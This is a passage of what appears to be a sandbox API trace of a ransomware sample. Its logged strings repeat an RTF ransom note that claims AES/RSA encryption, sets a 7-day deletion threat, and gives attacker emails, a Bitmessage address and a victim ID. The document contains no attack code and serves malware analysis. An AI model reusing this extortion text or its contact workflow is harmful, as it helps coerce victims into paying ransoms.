h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.049] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.050] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 